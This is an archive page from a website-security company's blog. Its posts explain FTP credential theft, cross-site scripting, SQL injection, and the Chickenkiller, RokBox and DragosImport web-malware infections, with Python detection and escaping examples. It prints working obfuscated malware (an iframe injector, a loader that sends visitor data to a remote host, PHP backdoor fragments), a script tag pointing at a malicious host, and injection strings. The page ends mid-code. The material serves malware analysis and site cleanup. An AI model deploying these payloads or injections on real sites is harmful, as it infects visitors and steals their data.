Posts Tagged ‘malware’

Experts Explain: FTP Account Compromise

January 31st, 2012

This is the third part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

In this article, we describe one of the most common reasons why benign websites are hacked and then infected with malware: FTP password compromise. This particular technique is neither very sophisticated nor recent; nonetheless, it is extremely effective.

It is estimated that nearly 30% of all websites injected with malicious computer code are compromised through stolen credentials, such as FTP passwords. We will delve into some detail about FTP, how to protect yourself and your website from this kind of attack, and alternative best practices.

What is FTP?
File Transfer Protocol (FTP) is a protocol that specifies how to communicate with a computer, such as a web server, in order to access the files on that computer. FTP is simply a set of rules according to which your computer can talk to a file server, web server or other computer and reliably exchange information.

FTP is built on another popular Internet protocol, the Transmission Control Protocol (TCP). FTP follows a client-server model, in which the computer that requests data is the client and the computer supplying the data is the server. Both client and server understand how to “talk” to each other reliably using FTP.

How is FTP used?
FTP can be used for a number of purposes, one of the primary ones being webmasters uploading web pages to web servers. In general, FTP can be used to easily move files from one computer to another. Academic institutions also use FTP to move large data files from experiments onto dedicated computers meant for storing information.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software powering the website or by other means, such as compromised passwords (FTP, etc.).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website, (2) infect visitors to the compromised website, and more.

How do FTP credentials get compromised?
Credentials, such as FTP usernames and passwords, can be compromised by Trojans and viruses installed on the computers of unsuspecting users, which “sniff” the credentials as they are transferred over the Internet to the web server. FTP transfers credentials and data in clear-text. This means that any person or program “listening” in on the transmission of credentials to the FTP server can read them relatively easily and steal them.

There is extensive literature on rootkits, sniffing software, and key loggers on the Internet. A popular Trojan called ZBot was analyzed by Prevx and details were released in this forum entry. This particular Trojan is installed from a number of vectors: Rogue Antivirus advertisements, spam emails, fake codecs, and more. This Trojan is very effective at stealing FTP credentials and passing them to a “master” server that injects malware onto the associated websites.

How are the FTP credentials used to infect websites?
Once a Trojan like the one described above acquires FTP credentials, it passes the information to a master server called a “command and control” server. This command and control server could be present on an IRC chat channel, for example. Once the Trojan has stolen the credentials and (automatically) notified the master server via the chat channel, the master server uses the credentials to infect the website with malware.

How to detect if your site is vulnerable to FTP credential compromise attacks?
If you use FTP for access to files on your website, you need to be very careful. If you store your FTP usernames and passwords on your local computer using software like FileZilla, your website can be compromised if malicious software or a Trojan is installed on your computer. Never store credentials on your local computer.

Additionally, you should use SFTP (Secure FTP), SSH (Secure Shell), or SCP (Secure Copy), all of which use encryption, instead of FTP, or any other method that does not transfer credentials to your server in clear-text. This avoids credential compromise from “sniffing” attacks. Note that encryption protects the credentials in transit only; a Trojan on your own computer can still read credentials stored in a client such as FileZilla, which is why the previous point matters.
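As an added example (not code from the original post), the following Python script applies the point above defensively on the server side: it reads a constructed FTP server log in a hypothetical format and flags logins from an address the account has never used that are followed within minutes by uploads of web content, which is how stolen credentials typically get used to inject pages. The log format, file names and addresses are all constructed for the example.

```python
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed FTP server log in a hypothetical format (not any real server's
# native format): "<ISO time> <EVENT> user=<name> ip=<addr> [file=<path>]".
# 203.0.113.9 is the webmaster's usual address; 198.51.100.77 stands in for the
# attacker's "master" server reusing the stolen credentials to push injected pages.
SAMPLE_LOG = """\
2012-01-28T09:02:11 LOGIN user=webmaster ip=203.0.113.9
2012-01-28T09:03:40 STOR user=webmaster ip=203.0.113.9 file=/public_html/news.html
2012-01-29T14:10:05 LOGIN user=webmaster ip=203.0.113.9
2012-01-30T03:12:51 LOGIN user=webmaster ip=198.51.100.77
2012-01-30T03:12:53 STOR user=webmaster ip=198.51.100.77 file=/public_html/index.html
2012-01-30T03:12:54 STOR user=webmaster ip=198.51.100.77 file=/public_html/js/main.js
2012-01-30T03:13:02 STOR user=webmaster ip=198.51.100.77 file=/public_html/uploads/photo.jpg
2012-01-30T10:00:00 LOGIN user=webmaster ip=203.0.113.9
"""

WEB_CONTENT = (".html", ".htm", ".php", ".js")   # file types an injection rewrites


def parse_log(text):
    """Yield (time, event, user, ip, file_or_None) from the constructed format."""
    for line in text.splitlines():
        if not line.strip():
            continue
        stamp, event, *fields = line.split()
        kv = dict(f.split("=", 1) for f in fields)
        yield datetime.fromisoformat(stamp), event, kv["user"], kv["ip"], kv.get("file")


def suspicious_sessions(text, known_ips, window=timedelta(minutes=10)):
    """Flag logins from an address not in the account's known set that are followed
    within `window` by uploads (STOR) of web content from that same address.

    known_ips: {username: set of addresses the administrator recognises}.
    Returns one dict per suspicious login. A login from an unknown address that
    uploads nothing is not reported here, so review those separately.
    """
    events = sorted(parse_log(text), key=lambda e: e[0])
    uploads_by_user_ip = defaultdict(list)
    for t, event, user, ip, path in events:
        if event == "STOR" and path and path.lower().endswith(WEB_CONTENT):
            uploads_by_user_ip[(user, ip)].append((t, path))
    findings = []
    for t, event, user, ip, _ in events:
        if event != "LOGIN" or ip in known_ips.get(user, set()):
            continue
        files = [p for t2, p in uploads_by_user_ip[(user, ip)] if t <= t2 <= t + window]
        if files:
            findings.append({"user": user, "ip": ip, "time": t.isoformat(), "files": files})
    return findings
```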

Conclusion
FTP credential compromise is a common vector for malicious hackers to exploit and infect websites. We have seen what FTP is, how it is exploited by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kinds of threats and help them recover from compromises should they occur. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Categories: News, Report

Experts Explain: Cross Site Scripting

January 24th, 2012

This is the second part in a series of posts here at StopTheHacker where we describe the various methods that malicious hackers use to infect benign and legitimate websites with web-malware.

This time, we will discuss one of the most prolific techniques used to compromise millions of websites: Cross Site Scripting. Cross Site Scripting attacks have been seen for many years now and remain a continuing threat. In fact, by the latest statistics, more than 75% of websites have at least one Cross Site Scripting vulnerability.

It is no wonder that thousands of sites are compromised every single day, only to infect their unsuspecting visitors and end up on blacklists. In this article, we will delve into detail on Cross Site Scripting, how to identify vulnerabilities, how to stop them from being exploited, and more.

What is Cross Site Scripting?
Cross Site Scripting is an attack wherein a hacker exploits vulnerabilities in the software powering a website to launch an attack on the user. The attack can range from the display of a fake Anti-Virus advertisement to an unsuspecting user, all the way to a sophisticated port scan run using an injected toolkit.

Cross Site Scripting is primarily used to forward users to a URL that looks genuine, and is in fact pointing to a legitimate business website. However, when the user visits the URL in a browser, the content displayed is from a malicious source that can compromise and infect the visitor.

An important point to understand: Cross Site Scripting is not the same as Phishing. Phishing is the attempt to deceive someone that a web page actually belongs to a bank (or a similarly important institution), when it does not, in order to steal credentials.

Cross Site Scripting attacks direct users to a legitimate website with malicious content loaded from malicious sources. Cross Site Scripting attacks help hackers set up phishing campaigns and can be used as a tool to enable these malicious activities.

What is XSS?
XSS is an abbreviation for Cross Site Scripting. Some people also refer to Cross Site Scripting as CSS, though this conflicts with the more popular abbreviation of CSS, Cascading Style Sheets, a widely used term in web technology. XSS is a less ambiguous abbreviation for Cross Site Scripting.

What is a code injection attack?
A code injection attack is an unwarranted effort to load malicious computer code onto a website, by exploiting weaknesses in the software powering the website or by other means, such as compromised passwords (FTP, etc.).

This attack usually manifests itself when a malicious hacker identifies a particular weakness in the way a website handles user input and exploits that weakness to load the malicious computer code, infecting the web pages on the website. This allows the malicious hacker to (1) steal information from the compromised website, (2) infect visitors to the compromised website, and more.

What kind of vulnerabilities allow XSS attacks to happen?
XSS attacks occur primarily due to improper sanitization of user input. Consider the case where a hypothetical website has a form on a webpage that accepts a user’s email address to send a newsletter to them.

The web application that processes the email address might not have been well constructed. Due to defects in the computer code that accepts the input from the user and processes it, a hacker may be able to run their own malicious computer code. It is very important to ensure that user input is not trusted implicitly. Validation must be performed on all user input to verify that the data is benign.

What are the major types of XSS attacks?
There are two primary types of XSS attacks: Persistent XSS and Reflected XSS. Persistent XSS attacks lead to the injection of malware onto the webpages of a weakly secured website where it is stored. Reflected XSS attacks are often used to make the weakly protected website act as a vehicle for malicious actions, while there is no real malware stored on the webpages (hence the name reflected).

Persistent XSS Attack Example
A malicious hacker realizes that an input form, such as a password field, is not properly sanitizing its input, tries to exploit it, succeeds, and is then able to permanently store malware on the website by infecting its webpages.

Consider that the input form might be expecting the user to provide an email address for a newsletter subscription, but the hacker enters an email address and also attaches computer commands to it. Weakly secured code in the web application analyzes this input, stores the email address, and then runs the other commands that the hacker included. This can allow the hacker to load malware onto the webpages.

Reflected XSS Attack Example
A malicious hacker identifies the various fields accepted as user input and attaches malicious commands as the values to be submitted for some or all of the fields in order to cause the web server to display (reflect) the malware back to the unsuspecting user who clicked the malware laced link.

In this scenario, the malware is self-contained inside an HTTP link. This attack succeeds because most users are used to clicking on links without checking the actual contents of the URL; malicious hackers are banking on this. These malicious links can be distributed via email, and once a user clicks on one, the web server of the legitimate but insecure website is used to display the malware contained in the link to the user, via the browser the user is using to view the link.

Another XSS Attack Example
Consider a website that has URLs of the following type:

http://www.yoursite.com/index.html?name=Alex

Let us say the parameter “name” is used to define the name value for the user. The website uses this value to say “Hello Alex” on the webpage. In this example, a malicious hacker can exploit the parameter “name” by placing malicious code in the parameter instead of the expected name, as below:

http://www.yoursite.com/index.html?name=<script>alert('XSS vulnerability')</script>

This shows a message box to the user displaying the words ‘XSS vulnerability’, but in reality, actual malware code could have been loaded via this exploit on a website employing the same technique.

This attack succeeds because the web application that analyzes this URL and powers the website incorrectly trusts the user to always input safe data. It is not prepared for threats like this. In this case, a malicious hacker has used a benign website to launch a malware attack on an unsuspecting customer, and the website owner usually has no idea that his or her website was exploited.

How to detect if your site is vulnerable to XSS attacks?
There are many ways to check if your website is vulnerable to XSS attacks:

  1. Find out if any of the software powering your website takes user input directly and uses it directly, without sanitizing it. For example: can a user attach a semicolon, colon, or bracket symbol in the text they are providing to the website as input, and have these special characters displayed back to them un-escaped?
  2. Find out if the software that powers your website is out of date. If it is, apply all recommended patches or upgrade to the latest version of the software.
  3. Find out if the third party plugins that your website employs, are at risk to XSS attack vulnerabilities.
  4. Conduct a vulnerability assessment scan of your website to identify any XSS vulnerabilities. Any vulnerabilities found should be fixed as soon as possible.
  5. Use a Web Application Firewall (WAF) and a Firewall to prevent malicious access to the website.
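The “Hello Alex” page above and the first check in the list, as an added example in Python (not code from the original post): the vulnerable renderer pastes the name parameter into the page, the hardened renderer escapes it, and echoes_unescaped() implements the probe for special characters displayed back un-escaped. The URLs are the ones from the post; the function names and the sentinel string are the example's own.

```python
import html
from urllib.parse import urlsplit, parse_qs

# URLs from the post: the benign request and the probe a vulnerable page reflects as script.
BENIGN_URL = "http://www.yoursite.com/index.html?name=Alex"
PROBE_URL = "http://www.yoursite.com/index.html?name=<script>alert('XSS vulnerability')</script>"


def name_from_url(url):
    """Return the `name` query parameter of a URL ("" if absent)."""
    return parse_qs(urlsplit(url).query).get("name", [""])[0]


def render_vulnerable(name):
    """The defect the post describes: the value is trusted and pasted into the page,
    so whatever markup the visitor's link carried is sent back to the browser as HTML."""
    return "<p>Hello " + name + "</p>"


def render_safe(name):
    """Hardened form: the value is escaped for the HTML text context before output.
    quote=True also escapes quotes, which matters if the value lands inside an attribute."""
    return "<p>Hello " + html.escape(name, quote=True) + "</p>"


# Markup-significant characters; check 1 in the list above asks whether a
# visitor can get characters like these displayed back un-escaped.
MARKUP_CHARS = "<>\"'"
MARKER = "xqz9"   # sentinel unlikely to occur in the page around the reflected value


def echoes_unescaped(render):
    """Return the set of MARKUP_CHARS that `render` reflects verbatim. Each character
    is sent between sentinel strings so the page's own tags (the <p> wrapper here)
    are not mistaken for a reflected character. A non-empty set means the output
    is not being escaped for this context."""
    reflected = set()
    for c in MARKUP_CHARS:
        probe = MARKER + c + MARKER
        if probe in render(probe):
            reflected.add(c)
    return reflected
```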

Conclusion
XSS is a popular vector for malicious hackers to exploit and infect websites. We have seen what XSS is, how it is used by hackers, and how to protect your website.

StopTheHacker.com customers have access to resources and services that protect them against these kinds of threats and help them recover from compromises should they occur. If you want to protect your website right now, visit our services page.

Categories: Report, Security

Experts Explain: SQL Injection

January 17th, 2012

Website security is an arms race. Malicious hackers modify their methods constantly to infect benign and legitimate websites with web-malware. One of the most common techniques used to compromise millions of websites is called SQL Injection.

SQL injection attacks have been making headlines increasingly in the past few months. This highlights the sorry state of security practices and poorly implemented websites. In this article we will delve into detail about SQL injection, how to identify vulnerabilities, how to stop them from being exploited and more.

What is SQL?
SQL is an abbreviation for Structured Query Language. SQL is a computer programming language that is used to interact with software called databases. These databases are containers of information. The information can range from home addresses, usernames and passwords to social security numbers, entire movies and more.

Why do we need SQL?
Programmers and software need to use SQL in order to interact with information stored in databases. SQL is a standardized way to ask questions and retrieve results from a database.

SQL also allows the questions (also called queries) asked of a database to be optimized so that they are processed faster and answered sooner. SQL is therefore a very important tool for interacting with data storage systems such as databases when you want to store or retrieve information easily, reliably and quickly.

Why does my website use SQL?
SQL allows a website to become “dynamic.” A website no longer needs to be a collection of “static” webpages. SQL allows webpages to store and display user information such as: usernames, passwords, addresses, credit card numbers and much more.

Visitors can now not only read information on the webpages, but can also interact with the website by storing information about themselves. This information, stored in databases, can be used to provide a customized experience for website visitors. A good example of the functionality a website gains by using SQL and databases is allowing users to create a personal account on the website, as on Google or Facebook.

What is a code injection attack?
A code injection attack is basically an unwanted request for a website to run malicious computer code. These attacks succeed by exploiting weaknesses in the software that is powering the website or by other means, such as compromised passwords (FTP).

This kind of attack usually starts when a malicious hacker identifies a weakness in the way a website handles user input and exploits that weakness to run malicious computer code, in order to infect the web pages on the website (maliciously change their content). This could allow the malicious hacker to (1) steal information from the compromised website, (2) infect the visitors viewing the compromised website, and more.

What vulnerabilities lead to SQL Injection attacks?
There are many reasons why an SQL Injection attack becomes successful. One of the primary reasons is that website developers often forget that they should never trust user input. Forgetting this rule of thumb has severe consequences.

SQL injection attacks primarily succeed when the programs powering website forms (a form is any area on a website that accepts user input, like a username and password box) use the data provided by the visitor directly in their SQL queries to a database. This is dangerous.

Malicious hackers can exploit this mistake by “injecting” malicious input, unexpected by the code powering the website, to change the SQL query into a malicious one that may request valuable or sensitive information from the database instead of what the original author intended.

An example of SQL Injection
Consider the relatively recent spate of attacks on millions of websites that led to the injection of the following code:

<script src="hxxp://lilupophilupop.com/

Is your site vulnerable to SQL injection?
There are many ways to check if your website is vulnerable to SQL Injection.

  1. Determine if the code powering your website takes user input directly to create an SQL query. If so, you should modify this behavior immediately.
  2. Find out if the software that powers your website is out of date. If it is, apply all recommended patches or upgrade to the latest version of the software.
  3. Find out if the third party plugins that your website uses (for example, those used to dynamically resize images) have SQL injection vulnerabilities.
  4. Conduct a vulnerability assessment scan of your website to find additional SQL Injection vulnerabilities. Fix any you find as soon as possible.

Protect your site from SQL injection
You can protect your website from SQL Injection attacks by taking the following precautions:

  1. Make sure that the software powering your website does not trust user input blindly. If you wrote it yourself, you need to sanitize user input and never use this input directly to form SQL statements or query a database.
  2. Make sure all application software like WordPress, CMSs, and third party plugins are updated to the latest version and are fully patched.
  3. Make sure you identify all SQL injection vulnerabilities on your website using vulnerability scans.
  4. Use a Web Application Firewall (WAF) and a network firewall to prevent malicious access to the website.
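An added example (not from the original post) showing the mistake described under “What vulnerabilities lead to SQL Injection attacks?” next to the fix from precaution 1, using Python's sqlite3 module with a constructed one-row users table: the first login check concatenates the form values into the query text, the second binds them as parameters so they can never change the statement.

```python
import sqlite3


def make_db():
    """In-memory users table with one constructed account (not real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 'correct horse')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """The mistake the post describes: form values are concatenated straight into SQL.
    The statement text changes with the input, so the input controls the query."""
    sql = ("SELECT username FROM users WHERE username = '" + username +
           "' AND password = '" + password + "'")
    return conn.execute(sql).fetchone() is not None


def login_parameterized(conn, username, password):
    """Hardened form: placeholders. The statement is fixed and the values are bound
    as data by the driver, whatever characters they contain."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone() is not None


# The classic tautology input, used here only to show why the parameterized query
# is required: concatenated, it turns the WHERE clause into one that is true for
# every row; bound as a parameter, it is just a password that matches nothing.
TAUTOLOGY = "' OR '1'='1"
```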

Conclusion
SQL injection is a popular vector for malicious hackers to exploit and infect websites. We have seen what SQL injection is, how it is used by hackers and how to protect your website.

StopTheHacker.com customers have access to resources that protect against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Categories: Report, Security

Chickenkiller Infections

December 20th, 2011

Malicious hackers are continuously evolving the strategies they use to infect thousands of innocent and benign websites with malicious computer code, i.e. web malware.

Web malware is a relatively recent phenomenon and is quite different from the “standard” viruses and trojans that are known to infect PCs and servers.

How do I identify the malicious code?
A new strain of web malware has been making the rounds in the last few months. This particular infection has been nicknamed Chickenkiller. It is usually found with associated JavaScript obfuscated using the Dean Edwards Packer program.

An example is shown below:

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('r n(5){3 b=\'w\';3 c=h e();k(3 i=0;i<x;i++){c[b.f(i>>4)+b.f(i&u)]=t.q(i)}6(!5.s(/^[a-v-9]*$/i))o y;6(5.g%2)5=\'0\'+5;3 l=5.g;3 7=h e();3 j=0;k(3 i=0;i<l;i+=2){7[j++]=c[5.A(i,2)]}o 7.z(\'\')}6(8.m.C(\'p=d\')==-1){8.B(n(\'D\'));8.m=\'p=d\'}',40,40,'|||var||data|if|result|document|||b16_digits|b16_map|enabled|Array|charAt|length|new|||for|ll|cookie|hDcd|return|cookieh|fromCharCode|function|match|String|15|f0|0123456789abcdef|256|false|join|substr|write|indexOf|3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e'.split('|'),0,{}));

This de-obfuscated code is easier to read:

function hDcd(data) {
    // Build a lookup table mapping every pair of hex digits to the byte it encodes.
    var b16_digits = "0123456789abcdef";
    var b16_map = new Array;
    for (var i = 0; i < 256; i++) {
        b16_map[b16_digits.charAt(i >> 4) + b16_digits.charAt(i & 15)] = String.fromCharCode(i);
    }
    // Refuse anything that is not pure hex.
    if (!data.match(/^[a-f0-9]*$/i)) {
        return false;
    }
    // Left-pad odd-length input with a zero so it splits into pairs.
    if (data.length % 2) {
        data = "0" + data;
    }
    // Decode two hex digits at a time.
    var ll = data.length;
    var result = new Array;
    var j = 0;
    for (var i = 0; i < ll; i += 2) {
        result[j++] = b16_map[data.substr(i, 2)];
    }
    return result.join("");
}

// Write the decoded markup (a div positioned off-screen containing an iframe)
// only once per browser: the cookie set afterwards suppresses the injection on
// later visits, so a repeat fetch of the page looks clean.
if (document.cookie.indexOf("cookieh=enabled") == -1) {
    document.write(hDcd("3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"));
    document.cookie = "cookieh=enabled";
}
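As an added example (not part of the original post), a Python port of the hDcd() decoder above, applied to the hex constant from the sample so the hidden markup can be inspected without executing the script; triage() decodes every long hex literal in a file the same way and also records the cookie gate that suppresses the injection on repeat visits. The wrapper string and the regular expressions are the example's own.

```python
import re

# Hex constant copied from the de-obfuscated Chickenkiller sample above (the argument to hDcd()).
CHICKENKILLER_HEX = "3c646976207374796c653d22706f736974696f6e3a206162736f6c7574653b206c6566743a202d3139393170783b20746f703a202d3239393970783b223e3c696672616d652077696474683d22323022206865696768743d22343022207372633d22687474703a2f2f7570666c737679612e7a796e732e636f6d2f6d61696e2e7068703f706167653d63363962643032653933653639353763223e3c2f696672616d653e3c2f6469763e"

# Constructed wrapper reproducing the cookie-gated document.write() of the sample,
# used as input for triage() below.
CHICKENKILLER_JS = ('if(document.cookie.indexOf("cookieh=enabled")==-1){'
                    'document.write(hDcd("' + CHICKENKILLER_HEX + '"));'
                    'document.cookie="cookieh=enabled";}')


def hdcd(data):
    """Port of the malware's hDcd(): hex digit pairs -> text, False if not hex.
    Odd-length input is left-padded with a zero, exactly as the original does."""
    if not re.fullmatch(r"[0-9a-f]*", data, re.IGNORECASE):
        return False
    if len(data) % 2:
        data = "0" + data
    return "".join(chr(int(data[i:i + 2], 16)) for i in range(0, len(data), 2))


LONG_HEX = re.compile(r'"([0-9a-fA-F]{40,})"')        # hex string literals worth decoding
COOKIE_GATE = re.compile(r'document\.cookie\.indexOf\("([^"]+)"\)\s*==\s*-1')
IFRAME_SRC = re.compile(r'<iframe[^>]*\bsrc="([^"]+)"', re.IGNORECASE)
OFFSCREEN = re.compile(r'(?:left|top)\s*:\s*-\d+px', re.IGNORECASE)


def triage(js_text):
    """Decode every long hex literal the way hDcd() would and report what it hides.

    Returns a dict with:
      iframe_srcs : src of each iframe found in the decoded markup
      offscreen   : True if the decoded markup is positioned off the visible page
      cookie_gate : the cookie whose presence suppresses the injection, or None
    """
    srcs, offscreen = [], False
    for literal in LONG_HEX.findall(js_text):
        markup = hdcd(literal)
        if not markup:
            continue
        srcs += IFRAME_SRC.findall(markup)
        offscreen = offscreen or bool(OFFSCREEN.search(markup))
    gate = COOKIE_GATE.search(js_text)
    return {"iframe_srcs": srcs, "offscreen": offscreen,
            "cookie_gate": gate.group(1) if gate else None}
```

Because of the cookie gate, a scanner that keeps a cookie jar between fetches sees a clean page from the second request on; fetch with a fresh session or inspect the file on disk as triage() does.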

Which sites are aiding the attack?
The malicious links associated with the “packed” JavaScript code are listed below.

hxxp://chicknercx43.chickenkiller.com/i.php?go=1
hxxp://zxr0.chickenkiller.com/kat3/gate.php
hxxp://bugs.chickenkiller.com:10/images/1.htm
hxxp://peacockog45g45.chickenkiller.com/

These links all resolve to a single IP address. As the hostname suggests, the IP address and host were created with malicious intent; this is an example of a site deployed specifically to spread malware.

IP address: 77.232.70.33
Hostname: bl4ckh4x0rs.com

The malware has infected many sites including those below.

phislin.com
827512.com
jinti.com
cnad.com
siwayishu.com

How do I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

Categories: News, Report, Security

RokBox.js Infections

December 8th, 2011

Today’s websites make use of many third party plugins to add new functionality with the least amount of effort. The inclusion of these third party plugins brings significant additional risk, namely the introduction of vulnerabilities to one’s website through vulnerabilities in the plugin itself.

A prime example of this is the Timthumb malware outbreak that we discovered some time ago. In this post, we will discuss the malware infecting another third party plugin, RokBox. At this time, we have not seen very many websites with this issue, so we do not know if a vulnerability in RokBox is the root cause of the infection. However, the malware code we discuss has been found on Joomla and WordPress sites where the RokBox plugin is installed.

What does a third party plugin do?
Third party plugins allow websites to include new functionality without much effort on the part of the website owner. They can improve the management and display of images, allow the insertion of audio and video players, and in general improve the user experience.

Additionally, third party plugins are very popular among website administrators and designers because they allow good looking websites with advanced capabilities to be launched rapidly.

What is RokBox?
According to the RocketTheme website, on which RokBox is hosted, RokBox “is a mootools powered JavaScript slideshow that allows you to quickly and easily display multiple media formats including images, videos (video sharing services also) and music.” It also provides a theme management system that allows website owners to create their own custom themes and manage them. It is a successor to the RokZoom plugin. RokBox is very popular with administrators of Joomla websites.

More details about RokBox: Joomla Extensions – RokBox.

How do I identify the malicious code?
The malware is appended at the very end of the benign RokBox JavaScript (Dean Edwards packed). The malware loads additional malware from the IP address 91.196.216.64, which is based in Russia.

A sample of the actual malware is shown below:

var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64","\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x77\x69\x64\x74\x68","\x68\x65\x69\x67\x68\x74","\x63\x68\x61\x72\x73\x65\x74","\x6C\x6F\x63\x61\x74\x69\x6F\x6E","\x72\x65\x66\x65\x72\x72\x65\x72","\x75\x73\x65\x72\x41\x67\x65\
[snipped]
x43\x68\x69\x6C\x64"];element=document[_0xdc8d[1]](_0xdc8d[0]);if(!element){cls=screen[_0xdc8d[2]];sw=screen[_0xdc8d[3]];sh=screen[_0xdc8d[4]];dc=document[_0xdc8d[5]];lc=document[_0xdc8d[6]];refurl=escape(document[_0xdc8d[7]]);ua=escape(navigator[_0xdc8d[8]]);var js=document[_0xdc8d[10]](_0xdc8d[9]);js[_0xdc8d[11]]=_0xdc8d[0];js[_0xdc8d[12]]=_0xdc8d[13]+refurl+_0xdc8d[14]+cls+_0xdc8d[15]+sw+_0xdc8d[16]+sh+_0xdc8d[17]+dc+_0xdc8d[18]+lc+_0xdc8d[19]+ua;var head=document[_0xdc8d[21]](_0xdc8d[20])[0];head[_0xdc8d[22]](js);} ;

A sample of the benign RokBox code is shown below:

/**
* RokBox System Plugin
*
* @package		Joomla
* @subpackage	RokBox System Plugin
* @copyright Copyright (C) 2009 RocketTheme. All rights reserved.
* @license http://www.gnu.org/copyleft/gpl.html GNU/GPL, see RT-LICENSE.php
* @author RocketTheme, LLC
*
* RokBox System Plugin includes:
* ------------
* SWFObject v1.5: SWFObject is (c) 2007 Geoff Stearns and is released under the MIT License:
* http://www.opensource.org/licenses/mit-license.php
* -------------
* JW Player: JW Player is (c) released under CC by-nc-sa 2.0:
* http://creativecommons.org/licenses/by-nc-sa/2.0/
*
*/

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};

Is my site infected?
To find out if your site is infected, search for the strings “_0xdc8d”, “refurl”, and “\x63” all in the same file. You can use tools like grep or wingrep to help you. Further, make sure that all of your plugins and your WordPress or Joomla installation are up to date. It is good practice to change all your access passwords as well.

How should I protect my site?
Webmasters and administrators should search for instances of the malware (including malicious links, iframes, scripts, etc.) on their sites and ensure that they remove all occurrences. More importantly, it is critical to continuously monitor your website for compromise. You need to know if your website has been compromised so you can keep your visitors and your online reputation from being hurt.

StopTheHacker.com customers are protected against these kinds of threats. If you would like more information on how to protect your website, please feel free to contact us. You can also visit our services page to protect your website right now.

Till next time…

Categories: News, Report, Security

DragosImport, Domboware Attacks

December 5th, 2011

In recent weeks, two websites have increasingly been used to mount attacks on unsuspecting visitors of legitimate, benign sites compromised by malicious hackers. We discuss the details of these distribution sites in this post.

Is my site infected?
First, to determine if your site has been compromised by the infections mentioned here, search your website hosting directory for the following two lines of malware.

script src=hxxp://dragosimport.com/js/
script src=hxxp://domboware.hu/js/

We have also found the following PHP code on websites infected by these two scripts. Use grep (or wingrep) to search for the PHP code listed below.

@error_reporting(0); if (!isset($eva1fYlbakBcVSir)) {$eva1fYlbakBcVSir = "7kyJ7kSKioDTWVWeRB3TiciL1UjcmRiLn4SKiAETs
[snipped]
 $eva1tYldakBcVSjr(chr(3625*0.016), $eva1tYidokBoVSjr);$eva1tYldokBcVSjr($eva1tYidokBcVSjr[0.016*(7812.5*0.016)],$eva1tYidokBcVSjr[62.5*0.016],$eva1tYldakBcVSir($eva1tYidokBcVSjr[0.061*0.031]));$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";$eva1tYlbakBcVSir = "\x67\141\x6f\133\x70\170\x65";$eva1tYldakBoVS1r = "\x65\143\x72\160";$eva1tYldakBcVSir = "";$eva1tYldakBoVS1r = $eva1tYlbakBcVSir.$eva1tYlbakBcVSir;$eva1tYidokBoVSjr = $eva1tYlbakBcVSir;} ?>

One such site hosting this malware is nchr.org. Interestingly, many of the sites infected are running osCommerce. We will provide more detail on the vulnerability exploited in an upcoming post.
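An added example (not code from the original posts or from RocketTheme) that covers the marker search from the RokBox post above and the PHP sample just shown: it decodes the \xNN string table of the _0xdc8d script, resolves the \xNN and \NNN escapes and the chr(a*b) arithmetic the PHP sample uses, and tests a file for the three RokBox markers. The fragments are the visible parts of the two samples on this page; the regular expressions are the example's own.

```python
import re

# Fragments copied from the two samples above (the page snips both; these are the
# visible parts). Raw strings keep the backslashes literal, as they are on disk.
ROKBOX_FRAGMENT = (
    r'var _0xdc8d=["\x73\x63\x5F\x63\x6F","\x67\x65\x74\x45\x6C\x65\x6D\x65\x6E\x74\x42\x79\x49\x64",'
    r'"\x63\x6F\x6C\x6F\x72\x44\x65\x70\x74\x68","\x72\x65\x66\x65\x72\x72\x65\x72"];'
    r'refurl=escape(document[_0xdc8d[7]]);'
)
PHP_FRAGMENT = (
    r'$eva1tYldakBcVSir = "\x73\164\x72\x65\143\x72\160\164\x72";'
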